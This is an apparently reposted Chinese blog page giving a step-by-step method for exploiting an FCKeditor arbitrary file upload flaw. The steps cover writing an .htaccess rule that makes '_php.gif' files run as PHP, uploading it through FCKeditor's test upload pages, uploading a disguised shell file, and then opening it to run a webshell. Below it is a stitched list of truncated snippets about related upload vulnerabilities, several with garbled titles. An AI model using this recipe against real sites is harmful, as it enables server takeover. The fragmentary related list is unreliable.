2. 程式人生 > >fckeditor任意檔案上傳漏洞

fckeditor任意檔案上傳漏洞

阿新 發佈:2019-01-03

1. 建立.htaccess檔案,內容如下:

<FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> .htaccess檔案可以用來設定某個目錄和某個目錄的子目錄的許可權,以上內容的意思是將副檔名是"_php.gif"的檔案解析成php 2.使用如下url,上傳上面建立的的.htaccess檔案 http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
通過這一步上傳,上傳目錄的"_php.gif"檔案apache會按照php檔案解析
3.上傳shell.php.gif檔案 這一步還是使用如下url: http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html shell.php.gif檔案被上傳後,自動更名為shell_php.gif,shell_php.gif檔案就是後門檔案 4.訪問shell_php.gif,則可以,shell執行

相關推薦

fckeditor任意檔案漏洞

1. 建立.htaccess檔案,內容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> .htaccess檔案可以用來設定某個目錄

fckeditor 2 6 4 任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

FCKeditor connector php任意檔案漏洞

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

17.[CVE-2017-12615]Tomcat任意檔案漏洞

【CVE-2017-12615】 Tomcat任意檔案上傳漏洞 首先先貼出wooyun上的一個案例:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 看到這個漏洞讓我想到了IIS6.0任意檔案上傳的漏洞,不過現在大多都用工具,比如I

【程式碼審計】CLTPHP_v5.5.3 前臺任意檔案漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

PHP任意檔案漏洞(CVE-2015-2348)

安全研究人員今天釋出了一箇中危漏洞——PHP任意檔案上傳漏洞(CVE-2015-2348)。 在上傳檔案的時候只判斷檔名是合法的檔名就斷定這個檔案不是惡意檔案,這確實會導致其他安全問題。並且在這種情況下,在你自己的檔案中檢查漏洞很不現實,因為這個漏洞可以繞過你對檔名字尾、檔案型別(Content-Typ

WebLogic任意檔案漏洞(CVE-2018-2894)利用復現

環境搭建 參照: https://blog.csdn.net/qq_29647709/article/details/84892582 登入系統 環境啟動後,訪問http://192.1658.1.15:7001/console,即可看到後臺登入頁面。 登入後臺頁面,點選base_

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案漏洞動態分析(CVE-2018-2894)

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的

CVE-2015-2348(PHP任意檔案漏洞

漏洞編號:CVE-2015-2348漏洞影響版本:PHP 5.4.38~5.6.6漏洞成因:        通常情況下,PHP的開發者會對檔案使用者上傳的檔案的型別、檔案大小、檔名字尾等進行嚴格的檢查來限制惡意的PHP指令碼檔案的上傳漏洞的產生,但是攻擊者有時候可以結合語言的

Tomcat任意檔案漏洞CVE-2017-12615復現測試

今天爆出了一個tomcat7的任意檔案上傳漏洞,看了大牛們的分析後,我自己本地搭建環境複測。 漏洞影響的tomcat版本為tomcat7.0.0-7.0.81版本 我本地下載的是tomcat7.0.5

UEditor編輯器兩個版本任意檔案漏洞分析

0x01 前言 UEditor是由百度WEB前端研發部開發的所見即所得的開源富文字編輯器,具有輕量、可定製、使用者體驗優秀等特點 ,被廣大WEB應用程式所使用;本次爆出的高危漏洞屬於.NET版本,其它的版本暫時不受影響。漏洞成因是在抓取遠端資料來源的時候未對檔案字尾名做驗證導致任意檔案寫入漏洞,黑客利用此漏

web安全(6)-- 任意檔案漏洞

1.1 漏洞描述     上傳漏洞這個顧名思義,就是攻擊者通過上傳木馬檔案,直接得到WEBSHELL,危害等級超級高,現在的入侵中上傳漏洞也是常見的漏洞。     導致該漏洞的原因在於程式碼作者沒有對

織夢DedeCms任意檔案漏洞修復

一、/include/dialog/select_soft_post.php檔案,搜尋(大概在72行的樣子)      $fullfilename = $cfg_basedir.$activepath.'/'.$filename;      修改為      if (preg

phpcms v9.6.0任意檔案漏洞(CVE-2018-14399)

phpcms v9.6.0任意檔案上傳漏洞(CVE-2018-14399) 一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php檔案存在漏洞,該漏洞源於PHPCMS程式在下載遠端/本地檔案時沒有對檔案的型別做正確的校驗。遠端攻擊者可以利用該漏洞上傳並

[原創]K8 Struts2 Exp 20170310 S2-045(Struts2綜合漏洞利用工具) [原創]Struts2奇葩環境任意檔案工具(解決菜刀無法檔案亂碼等問題)

工具: K8 Struts2 Exploit組織: K8搞基大隊[K8team]作者: K8拉登哥哥部落格: http://qqhack8.blog.163.com釋出: 2014/7/31 10:24:56簡介: K8 Stru

fckeditor檔案漏洞(.NET)

前一段時間,由於用了fckeditor,沒有修改fckeditor的漏洞,被人家上傳了木馬,使得網站上出現不良資訊,伺服器被封半個月,心理很鬱悶,所以今天把fckeditor的漏洞以及能徹底解決這些漏洞的辦法寫出來。     你到網上搜索一下fckeditor漏洞,可以出現很

WebLogic 任意檔案遠端程式碼執行_CVE-2018-2894漏洞復現

WebLogic 任意檔案上傳遠端程式碼執行_CVE-2018-2894漏洞復現 一、漏洞描述 Weblogic管理端未授權的兩個頁面存在任意上傳getshell漏洞,可直接獲取許可權。Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞,We

文字檔案漏洞[任意.繞過.解析]

首先我們來普及一下幾個知識點,嘿嘿!! 什麼是檔案上傳漏洞? 檔案上傳漏洞是指由於程式設計師在對使用者檔案上傳部分的控制不足或者處理缺陷,而導致的使用者可以越過其本身許可權向伺服器上上傳可執行的動態指令碼檔案。這裡上傳的檔案可以是木馬,病毒,惡意指令碼或者WebShell等。這種攻擊方式是

檔案漏洞繞過技巧

檔案上傳漏洞繞過技巧 一、檔案上傳漏洞介紹   通常web 站點會有使用者註冊功能,而當用戶登入之後大多數情況下都會存在類似頭像上傳、附件上傳一類的功能,這些功能點往往存在上傳驗證方式不嚴格的安全缺陷,是在web 滲透中非常關鍵的突破口,只要經過仔細測試分析來繞過上傳驗證機制,往往會造成被攻擊

檔案漏洞例項

下面例項都是在墨者學院靶場做的,幾種常見的上傳姿勢 1.結合iis5.x/6.0解析漏洞上傳檔案 先上傳一個asp檔案,抓包看看返回結果是什麼   由上圖我們可以知道伺服器是iis6.0,接下來我們利用iis6.0解析漏洞來上傳我們的一句話,新增一個asp目錄